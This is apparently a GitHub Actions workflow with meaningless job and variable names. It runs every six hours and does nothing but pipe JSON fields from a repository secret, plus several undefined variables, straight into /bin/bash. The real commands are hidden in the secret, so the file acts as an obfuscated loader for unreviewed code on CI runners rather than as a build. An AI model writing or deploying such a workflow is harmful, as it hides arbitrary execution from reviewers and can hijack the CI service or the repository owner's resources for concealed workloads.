name: shidakai6789
on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shidakai6789
        env:
          c8: ${{ secrets.c8 }}
        run: |
          echo $c8 | jq -r .rf7219 | /bin/bash
          echo $l768 | jq -r .el34 | /bin/bash
          echo $wwvcb652 | jq -r .xd1 | /bin/bash
          echo $tq9 | jq -r .qvazz00 | /bin/bash
          echo $svr1840 | jq -r .qdri71 | /bin/bash

